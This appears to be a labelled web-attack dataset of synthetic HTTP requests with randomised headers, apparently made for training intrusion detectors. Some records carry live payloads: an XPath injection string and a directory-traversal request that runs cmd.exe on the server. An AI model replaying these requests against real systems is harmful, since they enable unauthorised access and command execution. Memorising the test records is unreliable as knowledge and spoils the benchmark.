GET /rtro/czXoNPD1Xr/srosesYTneuafeter4/deegn1rhobr3/ae4xkhvVXweP.msf?9anaxmrergutsrl=brinemz%27+++++or++++1%3C++tetqr%2Ften3%2F7a%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D+or+++++%27aop9%27+++%3D++++%27&mthnczzheear=5&eut=416205329&soieOeDzsetKtRg=6nou&6i1ohmtb69a=vz1pbrMRyg HTTP/1.1
Host: 20.11.46.14:80
Connection: keep-alive
Accept: image/*;q=0.8, video/*, video/*
Accept-Charset: iso-8859-5, x-mac-turkish;q=0.7, windows-1251;q=0.4, x-mac-roman, us-ascii
Accept-Encoding: *
Accept-Language: bpvF-rsi, t2ty-oTEsr, ove1otit-qae, eef-9nl, doitff-eb7hea01
Cache-Control: only-if-cached
Client-ip: 20.81.251.104
Cookie: taso42=nN<|D ceed ;Cuc7vBszTn=sFNzw;tnu=6;ktmtshe=r6XikCxKvh;1aednajoEwtpc=nnulla+imgeBlrmsribtsN
Cookie2: $Version="8"
Date: Fri, 20 Jul 07 13:40:26 UTC
ETag: "Rts2dC5s1wzXOEQErdDA"
Expect: hwia=ocTrss;metst=mplok
From: thhe@eis9.be
If-Modified-Since: Sun, 29 Oct 06 15:53:41 GMT
If-Unmodified-Since: Fri, 01 Aug 08 19:14:08 CET
If-Match: "P6A0asgm1IGG2IAzMdzO"
If-None-Match: *
If-Range: *
Max-Forwards: 072
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Basic cjhhZTp0b2h1bkll
Authorization: Basic Nmd2aDpOZm54aW4=
Range: 2359-0,-77
Referer: /nyzrnt/ftluOlve/noeyhZMn/tht0.avi
TE: chunked;q=0.9,gzip;q=0.7
Trailer: Referer
User-Agent: eIRxw7Hrtina
UA-CPU: x86
UA-Disp: 357,241,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 003x367
Via: reO26e/0.4 www.ettfTn.jpeg, FTP/3.0 www.bntsoe.gif
Transfer-Encoding: identity
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49053
Start - Id: 48726
class: XPathInjection
GET /g8nONhK0u@/llwY-RSsk70tg/y3rei/s6/rnhfdtapipr9ynane/ncky0RF1HBoFeeeG.jpg?ea9i=6Qstfdrisktgoaar&lib95.Q7group by8f=%5B&oKv7.0=%28i+++%3C+count%28latei%2Fchild%3A%3Atext%28%29%29++and++j+%3C+count%28dar%2Fchild%3A%3Acomment%28%29%29+++and+++k+++++%3C++++count%28Imi%2Fchild%3A%3A*%29+++%29&emwkBeime=ct4c&KT@oqMQRQxml@=erformhtacces&edglr=uejrm%40%3A%3Ceopmocha7has9ve&7yKOhWJ1=lpe1-&Llca=3151&f00albiio=237&gltc=liu5&dnito3ed=%5Cet&nIjt49rbersaoss=155682&Pn4w0OH=acmoter&mdte=N8uh%28%26saarndcir+jc&K3lJl=3222 HTTP/1.0
Host: 71.209.194.117:9560
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1;q=0.6, big5, big5;q=0.7, x-mac-chinesesimp;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 86.22.3.99
Cookie: oritote425h=9PK;izTtet=nml;copya >;@IJf7-_2ZMFE=ue;divE.N=ia3pnntn2qs;nua=Nve%h =G;sRtned=etle8m
Cookie2: $Version="515"
Date: Fri, 24 Oct 08 09:51:57 GMT
ETag: W/"V8UTY.e7_JhVggpJl"
Expect: 100-continue
From: juant@i0E7vA.biz
If-Modified-Since: Mon, 14 Nov 05 21:56:38 UTC
If-Unmodified-Since: Fri, 09 Apr 10 21:44:52 UTC
If-Match: "a9mLm.2tOZSRbRGG6L5m"
If-None-Match: "zfo7oCFukF4XNIM4y"
If-Range: *
Max-Forwards: 606
Pragma: no-cache
Proxy-Authorization: NTLM dTZld210U2hpaWhzaFNhdHVyZWRvcmNlZnBxQTNydzJlc3RyYW1o
Authorization: Basic dGVFZTppa3U5aA==
Range: 7-577073
Referer: /d8oewLm/aaeKinot/ioin.exe
TE: trailers
Trailer: Upgrade
User-Agent: cU@4vx http://www.dOh3t.biz
UA-CPU: Sparc
UA-Disp: 0723,340,16
UA-OS: Windows 98
UA-Pixels: 0339x4942
Via: 9.9 167.20.32.126
Transfer-Encoding: identity
Upgrade: jsys/9.9, esPjt/6.5, ns2dn/0.3, 7cR6zm/2.4
Warning: 042 95.15.3.29 "ettnnbeaTz7i" "Fri, 29 Apr 05 11:16:46 UTC"
X-Serial-Number: 3865979
----: ---------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48726
Start - Id: 44095
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.odhBnaiLc.de:80
Connection: keep-alive
Accept: image/gif, application/postscript;q=0.1, text/*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: htsfstoz-eocohgth
Cache-Control: max-stale=1814
Client-ip: 237.235.110.125
Cookie: iiirRb1eno=eITlig3aegeOeb;Roinetofoohn=eOtsE oso;ynwemts=9282433;ouNnc=5
Cookie2: $Version="94"
Date: Fri, 10 Jul 09 06:57:37 CET
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: ixam@eaec.uk
If-Modified-Since: Wed, 27 May 09 12:03:53 GMT
If-Unmodified-Since: Mon, 12 Dec 05 15:02:44 GMT
If-Match: *
If-None-Match: "V3Ha_YMdBSMA-AvjJ"
If-Range: Wed, 23 Sep 09 08:41:21 UTC
Max-Forwards: 5022
MIME-Version: 0.4
Pragma: msG='Alw'
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Basic YmlvdHRicG46R2hvY2N5dA==
Range: 70-
Referer: http://www.Onm7d1eH.uk/obab/xSNiyvh.cgi
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/9.5 (X11; U; Linux i386 0.1; wc-or; rv:5.7.2) Gecko/07588723
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: HTTP/3.0 135.149.112.57
Transfer-Encoding: hOUe
Upgrade: unHis2/9.7, sDw/8.7
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44095
Start - Id: 10519
class: Valid
GET /@-yqhunionecho6nTSR/6plhenaeut/qgtvr1Qgde48xlh/UV1U.ZddKU5form/aj6ubtLE1rntdntnee/8snot/ads9tansw0mprdmn/hultyZ5nCt9xEnp/rry5s/Shiibiaxqm030tnyz1fC/SfEATOK/5W1EXri.png?ECinaqQiabi7te=rIwdz1&tuNertjMtinEay=oF%40&i95d5=%3At0qyiservicesexecTtshh&oeodneoi=e0mNjOre5o&eTriatnjraci=etvux&riCrt=3739&baahSialM4=m_GEudYC&kLGqlrmWincludee=+orarrcp&hdiv.@as=oAr&adaUsms=5&ErrmUrsiiii=pSnN3t8r%28tmpF0daL%5B%26&htt=837&A3meoeRmniop=afen7smC&denoaeshat4wgmn=2eq0qUiuP&HaNHOOlLUv=561550 HTTP/1.1
Host: 101.226.236.246
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7, ks_c_5601-1987, utf-8;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 173.41.77.88
Cookie: 4dtsPOJUv=bo;i8=xOey6jdpSCVj;aeiuepm5aM6vZc=notEsseteizvw
Cookie2: $Version="740"
Date: Sun, 31 Jul 05 11:14:20 UTC
ETag: "GPGbZZ5jTNw4Y5hp"
Expect: hlfAO
From: uinswht@xe8rgtbys.cz
If-Modified-Since: Mon, 18 Dec 06 23:45:01 CET
If-Unmodified-Since: Sat, 17 Apr 04 19:45:59 GMT
If-Match: *
If-None-Match: "Z8_Kfp3TsIytzLN2I6"
If-Range: Sun, 13 Jul 08 02:58:53 UTC
Max-Forwards: 80
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic ZG1pcVNkcjM6aGFucng=
Authorization: NTLM cmVvcmNsdWhlbWVzenBsMmVCNEhvaWVldWxodGxwMnA=
Range: -11352
Referer: http://zFaRs.de/nedikTI/dnIarQje.jsp
TE: trailers,trailers,gzip;q=0.5
Trailer: Authorization
User-Agent: Mozilla/0.4 (compatible; hktwNds; SunOS sun4u; gi1t)
UA-CPU: StrongARM
UA-Disp: 710,2489,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4657x757
Via: 5.2 www.rwpunAvu.shtml, 9.0 54.152.97.151
Transfer-Encoding: compress
Upgrade: tl5/3.7, osrmh/0.5, mlszd/1.0, ruai/3.2, hde/0.2
Warning: 876 92.101.176.229 "roortcwwki3otne" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 44987486
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10519
Start - Id: 3000
class: Valid
GET /dkiitneFtoedzs9neaa/tmH/fs1rcetenso/vyusnSytwl8ai/artehntrjOje6d/9bYH1zf2access_logRUXKhttpsE.asmx?ArCor=abe&uwele=ySw0e9dbeqir&ssgdo=%2FOs7a&orohal=ee7%3F2cq2ategtA&etcM7ON4=0a&0dtsndstn=1&eafshaeewjtuba=Natl&cRr32urqtj01oO=lrwrhutiro%27h+%40dda%2F&ganbnd=504&e7f2scsauHkn=n0-o+%28toautoexec+idloEsadmin&xfhtupaskyyReh=Dio HTTP/1.0
Host: www.hona6e7ead.biz
Connection: Idzt
Accept: application/postscript;q=0.8, audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: feavya='wr4asb'
Client-ip: 66.146.113.199
Cookie: ecO=88242;Ur3whyrsnn1i=Wv66c8lowronati
Cookie2: $Version="186"
Date: Mon, 03 May 04 11:30:26 GMT
ETag: W/"oqgI8hu-id-K1uVS4C"
Expect: tMoo
From: sMew@IhehlCaold.be
If-Modified-Since: Sun, 12 Nov 06 08:24:25 GMT
If-Unmodified-Since: Wed, 31 Aug 05 05:15:44 CET
If-Match: "iVFAAOdXgpXr_Y@llmOZ"
If-None-Match: *
If-Range: "uBJ9-Ss4cVlBiZfOrz"
Max-Forwards: 15
MIME-Version: 7.9
Pragma: tiqei=5y
Proxy-Authorization: NTLM dWVPc1hsN3p3c2VUc3FXaG9FdGlnd2RuZTRlVWRsdGF0Zm90b2E=
Authorization: Digest nc=eB3E76Db
Range: -95612,2-
Referer: /RAdnr2/htAoS/ioenb/atnedro.avi
TE: deflate;q=0.4
Trailer: TE
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 5.7; np-dm; rv:8.8.6) Gecko/79770213
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1039x612
Via: FTP/4.8 2.17.253.136:23479, FTP/5.0 106.0.208.71
Transfer-Encoding: oahe
Upgrade: nqsh/1.3, aaiIb/2.1, SylCe/2.6
Warning: 133 129.24.35.131 "eutrftdlptmud" 
X-Forwarded-For: 191.50.240.235
X-Serial-Number: 39984855
----: ----------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 3000
Start - Id: 22879
class: Valid
GET /uinenab81/tJBYZAGWJ7CH/gL_ba1IA6Ok0JTy3/CnmoIU9MRTm/AthInh/eoyoidisisaiaien/sec/orOvmesh/ee/tjDw0iUU.jkxw/eadnEorrtrkuhahrb/s3hKD8hVFZYdK.msf?gnaihc9t=5uNDr&otal=eOv23AeP.&mtmten0h=i99esOi&tei=cZ8TSdaE&sho2=rTE%3Atexecp%29i+&jec7nbeHAo1ti=0547&h8aftapdaddTux=eOiv6&eeztSIc2=lE9axa8NeV&wirn6ruImE=iisaowA1KqPl&aptflad6gIe=erwlf-U74b&sberrres=0419 HTTP/1.1
Host: www.rEhsne3hs.it:64
Connection: ssviotd
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: lm=9q6mu
Client-ip: 5.243.112.159
Cookie: aedtwwe=ros;ceauuiKot=sPXAyO;t6Oyt7vc=06
Cookie2: $Version="915"
Date: Tue, 04 Apr 06 19:42:37 UTC
ETag: W/"FjRAi8E2THaWXBoTN_"
Expect: 100-continue
From: ntsdz@D3mgaa.it
If-Modified-Since: Mon, 17 Aug 09 14:01:48 GMT
If-Unmodified-Since: Fri, 11 Aug 06 09:46:35 GMT
If-Match: "8AgeTjzEjdxyt.4v7"
If-None-Match: "Z-dO3IyBFTAq-B4"
If-Range: *
Max-Forwards: 74
MIME-Version: 6.6
Pragma: Isena='katNiTut'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM SG8zdWliYWtiVWllYWMzcmJhbm9zbXl0c21QZ3Bjcm9tb3JuNW5hZG5laXNh
Range: 37032-5753,-977
Referer: http://www.oPslnsc.st/hieciz.gif
TE: trailers
Trailer: Max-Forwards
User-Agent: Dawtlh8EE/0.0
UA-CPU: x86
UA-Disp: 533,0632,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 301x6303
Via: ua9nh/9.8 www.z57urXwf.css:78685, FTP/3.2 106.182.240.13, t2gaRp/4.7 www.srem.png
Transfer-Encoding: ze6d7o
Upgrade: 6ahich/9.0, ixit/2.6
Warning: 312 56.128.98.138 "curonnltfRimjCnt" 
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22879
Start - Id: 27192
class: Valid
GET /t5XzSDrUYH6td6cU/suvBnbrT@/kerphsf/sZ@cPY7@aUxCqpmA.sh? HTTP/1.1
Host: 78.231.121.83:6
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=493
Client-ip: 177.226.50.169
Cookie: tyg1rttil=2107020
Cookie2: $Version="4"
Date: Mon, 14 Jul 08 23:43:11 CET
ETag: "v6laF5Qbp0MAbwY2Um"
Expect: etasaeeu
From: tnEr3ec@tnrtge.com
If-Modified-Since: Tue, 16 Dec 08 19:47:23 GMT
If-Unmodified-Since: Thu, 18 Oct 07 07:52:05 CET
If-Match: "veHhOwRG7HiOI7tjq"
If-None-Match: *
If-Range: Mon, 20 Dec 04 06:51:38 GMT
Max-Forwards: 90
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="lectex2b"
Authorization: NTLM cmxvbmhlZW1ldWVvcmh1aHJ1b2lxcmUxSXNjbmhyN29vaDc=
Range: 699285-,85178-1
Referer: /Estnnw/svtf.gz
TE: trailers,deflate;q=0.9
Trailer: Connection
User-Agent: Mozilla/5.0 (Windows; U; WinNT 0.6; lg-al; rv:9.1.6) Gecko/56678165
UA-CPU: x86
UA-Disp: 451,9242,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3319x950
Via: HTTP/4.6 www.rovq.gif:0, HTTP/9.3 213.132.249.172
Transfer-Encoding: deflate
Upgrade: Etiah/8.1, hsg/1.5
Warning: 012 249.202.129.195 "qlunrYneiw7Ooerioi" 
X-Forwarded-For: 202.203.219.213
X-Serial-Number: 437437535
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 27192
Start - Id: 16209
class: Valid
GET /it/yQSU@4MX@inVucSW5bEe/l3efeay/5lhlcFnMGEsHt/t_3fgob/bteleUltbvzsobeaclP/GZjQ/inxFdbzg/55cdain/arz.jsp? HTTP/1.1
Host: 112.197.126.217:80
Connection: keep-alive
Accept: audio/*, image/*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: tpr41ki-fieSeid6;q=0.2, rreiAoa-Rhtno;q=0.3, e6Hs7ne-Etumsr;q=0.7, one-Hwoho;q=0.3, sgy4seus-me
Cache-Control: min-fresh=838
Client-ip: 229.117.141.9
Cookie: Ine9bsn=55543565;NM=eautoexecnrntn@lw
Cookie2: $Version="205"
Date: Mon, 04 Sep 06 14:14:56 UTC
ETag: W/"@SJXhmTT2SU4I70"
Expect: dpsabr
From: oltae@ieknifNr4.org
If-Modified-Since: Fri, 01 Feb 08 12:57:22 UTC
If-Unmodified-Since: Sat, 30 Dec 06 21:16:30 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Dec 05 03:02:33 GMT
Max-Forwards: 9774
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest username="nEaw"
Authorization: NTLM bWVuanJ5b3N0dTVBSm9heWVhZGk5YTZkbmZzc0Zlb1duYXNkc2lobnNsdDk=
Range: 5711-,60-
Referer: http://rtpatei.st/e6seyn/5cnet/udomknye/0bouoi.jsp
TE: chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.2 (compatible; Konqueror/8.2; Mac OS X; i5toLnf2)
UA-CPU: PowerPC
UA-Disp: 202,714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 846x8936
Via: w7tao/7.2 www.oaoe7Of.tiff
Transfer-Encoding: deflate
Upgrade: tnl/8.4, hvmlz/2.3, sn2fh/0.4, tEir/3.1, eEcar/0.7
Warning: 562 www.72rhlemd.png "OanfqmoOtceaolig" 
X-Forwarded-For: 113.16.19.192
X-Serial-Number: 1816915028
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16209
Start - Id: 5785
class: Valid
POST /Ki7itblw/as9Gtvs1n/EeemwowVadrli/n.NoM_3.tiff? HTTP/1.0
Content-Length: 277
Content-Language: t1fiq,D,oenac
Content-Encoding: identity
Content-Location: /aoebt/gaa0m.sh
Content-MD5: c2hFaWFvOHdhYXhod0tzNw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Aug 09 03:40:00 CET
Last-Modified: Thu, 06 Sep 07 13:07:30 GMT
Host: www.taort.net
Connection: keep-alive
Accept: video/mpeg;q=0.2, text/*;q=0.8, application/x-tar;q=0.8
Accept-Charset: koi8-r, windows-1257
Accept-Encoding: gzip;q=0.2, identity, identity;q=0.1
Accept-Language: aaio-hkalrid, 9ehrfBee-flo, ntjos9h-htlm;q=0.9, htho-ei
Cache-Control: only-if-cached
Client-ip: 58.50.79.64
Cookie: esce=H>m nse~ettV$i qc;o6rua1Inlzae=sdeve9rrdrbknull;alnwma8laail=ndjDeG.
Cookie2: $Version="058"
Date: Mon, 26 Dec 05 05:58:00 UTC
ETag: "_iHgKGCmvAf6hTv-"
Expect: IC8awotu=ilhissh;t7trinn
From: o0am9fre@olkaeabem.net
If-Modified-Since: Mon, 01 Mar 10 09:47:09 GMT
If-Unmodified-Since: Sat, 28 Feb 04 04:37:10 GMT
If-Match: "WgDWvz7DXtsDXQvxoUEQ"
If-None-Match: *
If-Range: Fri, 12 Mar 10 16:03:45 UTC
Max-Forwards: 454
MIME-Version: 3.6
Pragma: esh='myf'
Proxy-Authorization: NTLM dGFvcnRvc2xyaW9nNjNycnJldHBmY3RvdnJuenRzc2hURWxt
Authorization: Basic UXVwajZ0Nzg6emNvYWU=
Range: 849-,-34420,95-
Referer: http://qItoitc.org/DakisItb/iucI/jietno.zip
TE: chunked,deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 8.8; Ma-em; rv:8.2.2) Gecko/89464979
UA-CPU: 68000
UA-Disp: 9613,3615,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 910x9129
Via: awAw/2.5 www.oyorxqs.jpg, 5.6 230.172.224.42
Transfer-Encoding: cnfh; l7sdhOe=rtecA
Upgrade: oreemE/7.6, rnu/7.4
Warning: 669 175.253.249.242:78324 "slmoebrsy6Uetltw" 
X-Forwarded-For: 55.81.28.168
X-Serial-Number: 94351330899239471408
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hmcneLtmvnu1n=tR3SG4&kJ75P=fbinen&rs==tjvariVtm&rmSunefolM7l=51&1eobr=193169&unaclatca=8&doetSE=0834244&o7wwfencye=coOOGw4sree9a&includeZ1SHGqa=a(dsb&ttthnpalitaeE=ghytws9&unmsopin9=lqiatols5&r6shhroulh70ndi=29h65ateof&iIkZefasock_stream@A=i3itOUTn&bkciEs4wI9tglMl=52492576

End - Id: 5785
Start - Id: 8714
class: Valid
GET /5wvorrtkhe9ez/oxI@TIG.rKe3jQnV/Tnph-bgsoundobjectYE@/a9iuaea/yYTRvtqHxJSIxm4xIM/UWdAbW-6fX/LpU@Xav.shtml? HTTP/1.1
Host: 60.89.19.249
Connection: nd6cspsh
Accept: text/plain;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: meanE-sf0hinr;q=0.3, na0p-ye3dm;q=0.7, eoYl-lSjnscod;q=0.8, D-oiuiou, yh-cniex
Cache-Control: no-transform
Client-ip: 113.0.45.30
Cookie: tslsrc9su=923122937
Cookie2: $Version="214"
Date: Fri, 22 Jan 10 10:11:45 GMT
ETag: "3BZ4dkZobbGdME1XAW"
Expect: esiot=axkD;7yAe=hhdoD2
From: mteeb@o92wOhll.cz
If-Modified-Since: Sat, 14 Oct 06 12:27:41 GMT
If-Unmodified-Since: Mon, 19 May 08 05:48:47 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 28 Oct 04 18:03:01 CET
Max-Forwards: 757
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: as9ct dmdsne=vmoz7nhe
Authorization: Digest qop=auth
Range: -1251,-8,78356-
Referer: http://www.cnDN4od.fr/lebuq/tuc7sRn/TeYI.png
TE: deflate,gzip;q=0.1
Trailer: TE
User-Agent: Mozilla/5.1 (compatible; Konqueror/9.0; Linux i386; mrkiobA; HefhI2xr; reeEtnnat)
UA-CPU: PowerPC
UA-Disp: 232,8608,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 559x025
Via: 7.7 www.ythoa.gif, HTTP/1.0 www.fIntegup.shtml
Transfer-Encoding: deflate
Upgrade: t6hhg/7.3, iEEkud/1.6
Warning: 722 191.87.245.62 "ldhaa3etlrseAcnvoe3a" "Fri, 03 Dec 04 20:48:39 CET"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 23222
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 8714
Start - Id: 5921
class: Valid
PUT /tltShcs/qrs9eetSbyvnkte/euGq.u/hverd/Qft-z/d20ungee6zo5uyetwf/o4MR/2I/eto2l6ZHL8qQ@Majrzp/div-Nhv_3VLbCoG.R.js? HTTP/1.0
Content-Length: 159
Content-Language: errati,eoos0
Content-Encoding: gzip
Content-Location: /izqOh/4lswir8l.pl
Content-MD5: dWVkdGlMbmxuY29sZm1kcg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 Mar 08 19:17:37 GMT
Last-Modified: Mon, 01 Jan 07 09:14:14 GMT
Host: www.iqq2orR.de
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: compress, gzip, gzip;q=0.8, compress;q=0.7, identity;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 35.87.71.24
Cookie: ryhehlAde=ee&+systemna\4nfaer;tNav=1tmetdm5rjccWle9E;Nbrtydme=nWZky;TiaieOnnkaiEwx=789;sB.4M=eCy;e71lrekith0nr=csn EYs
Cookie2: $Version="567"
Date: Sun, 03 Jun 07 21:55:19 CET
ETag: W/"6gSWAW_cdI7UAz0O"
Expect: brrcfr=ileAr;ohgl=iazsL
From: tioopae@jUht.st
If-Modified-Since: Wed, 02 Apr 08 01:03:37 UTC
If-Unmodified-Since: Sat, 24 Nov 07 12:03:21 GMT
If-Match: "o1iDQyfS__HwWNpN0"
If-None-Match: *
If-Range: Mon, 08 Aug 05 04:20:27 UTC
Max-Forwards: 3
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM MGVhZWFtbzVmTnNvYnpsaHluZWVyaGNmWDhVZW1zc2VxdGFhZXVjZmVycm5lYnVo
Range: 8-,5-,87-
Referer: http://elase.cz/iu849.avi
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: jatAapoc (oGf.YB@)
UA-CPU: PowerPC
UA-Disp: 860,981,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2011x601
Via: E8xom/7.3 www.ifbg.html, FTP/5.9 151.140.144.31
Transfer-Encoding: Rr5n; rso8at=Dnagaq
Upgrade: rct1/3.4, bcattq/1.0, ipaQo/9.6, n3hhl/7.2, nSfe/9.3
Warning: 697 185.37.75.36 "rRncnh" 
X-Forwarded-For: 81.125.98.15
X-Serial-Number: 673720584538972
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4R08ktoeg=e ninputvj (eiidubnmlAscript&bewniselayn6i=0750&me=30&0beah=1&soNotteoe73=e5hYM97&tdfet4c9h6oa4et=sna&bZaG=eQl0U&P1QC=25632469&naxR0_H=d2D311p-geZT

End - Id: 5921
Start - Id: 24656
class: Valid
GET /Hle/nyFSArRiS7T/6nzZU-/hmF.asmx? HTTP/1.0
Host: 200.255.134.107
Connection: dldenz
Accept: text/*, application/x-tar, application/*
Accept-Charset: windows-1250;q=0.7, koi8-r, x-mac-hebrew
Accept-Encoding: *;q=0.6
Accept-Language: knw-e0R;q=0.1, i-s;q=0.3
Cache-Control: only-if-cached
Client-ip: 252.174.24.134
Cookie: sytEtbuoeas=afs 3caiel;eym8tert=11671;nt2=vuHuo;eeeiyrbouGa=87491012
Cookie2: $Version="3"
Date: Thu, 02 Nov 06 06:47:54 GMT
ETag: "i.7Yq1YoQK.eJPxQ_v"
Expect: 100-continue
From: dtiJev@chlmiutOj.fr
If-Modified-Since: Fri, 16 Apr 10 17:29:26 GMT
If-Unmodified-Since: Tue, 13 Mar 07 18:05:50 CET
If-Match: *
If-None-Match: "Rb49Ig_wj9bEngNLO"
If-Range: *
Max-Forwards: 8390
MIME-Version: 3.5
Pragma: Ls='b94eewr'
Proxy-Authorization: Asws oa5d=buerH
Authorization: Digest uri=http://www.gathnS.gov/ai2dt/ea6nOib/seGe/jiiaept.css
Range: 7216-
Referer: /netl/srlUao8H/fdgS/CbFvk.fgf
TE: gzip;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/1.6 (Windows; U; Win 9x 8.7; ah-e4; rv:7.3.5) Gecko/43513074
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 578x008
Via: 2.6 165.228.149.61, HTTP/7.4 239.176.255.226
Transfer-Encoding: gzip
Upgrade: erm/1.1, qamkie/3.0, 4Eloit/4.3, e8iif/6.9
Warning: 630 240.228.130.93 "ldhdroewpruS9hem" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 56029803010715
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24656
Start - Id: 7824
class: Valid
POST /Ame2eaeaosnx/knVKyTtD7H60aQOs/5FpyHMRD.jpg? HTTP/1.1
Content-Length: 240
Content-Language: c
Content-Encoding: compress
Content-Location: /igatdd4.txt
Content-MD5: bkNlN09lNmVzdHdFMmNjZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 14 Jan 07 12:33:13 GMT
Last-Modified: Thu, 02 Dec 04 23:53:29 CET
Host: 116.227.1.77
Connection: keep-alive
Accept: application/*
Accept-Charset: windows-1254
Accept-Encoding: 
Accept-Language: s-s3Y, e0oa-rA, yc2-gt4Den;q=0.9, uthedri-3r6o, cyrc-5
Cache-Control: min-fresh=2965
Client-ip: 100.210.11.231
Cookie: uhRz=eccectToa3bL6;Loz1=h9M3;ernh1tGluo=tsworT1teyha5;5HZ._a.A2jD=8leIm;ivihaasetawbs=taf'ctnlinkirl5n
Cookie2: $Version="675"
Date: Thu, 16 Mar 06 22:46:19 UTC
ETag: "68kh4lmaleAcjYJu.WF"
Expect: 100-continue
From: k7euba@tlndi8g.org
If-Modified-Since: Thu, 10 Aug 06 23:32:50 CET
If-Unmodified-Since: Mon, 13 Sep 04 08:26:07 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 45
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM T3BpNHNobmVlYnNEdzhyaVRpOWp1cnVvdHRlVWp0QXduMGkyZVM=
Authorization: NTLM YWVtZW91ZXplYmdoeWE4aXRBdGJobWJubmVBaGRpdGFhMG9hMW5Ec29SZXJpT2w=
Range: 7699-
Referer: /tems/temD/ferw/fhsii8o/bae1uiz.php3
TE: trailers,chunked;q=0.1,deflate;q=0.0
Trailer: Pragma
User-Agent: Mozilla/0.5 (X11; U; Linux i586 3.4; t2-u0; rv:8.3.5) Gecko/28494620
UA-CPU: MIPS
UA-Disp: 442,791,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 669x1617
Via: 7.9 143.250.217.141, 1.7 www.eglbsics.shtml
Transfer-Encoding: identity
Upgrade: le7/5.5, eimt/4.8
Warning: 942 250.5.20.192 "brnistmyZweTt" "Tue, 13 Apr 10 19:40:14 UTC"
X-Forwarded-For: 205.233.18.56
X-Serial-Number: 5640669966
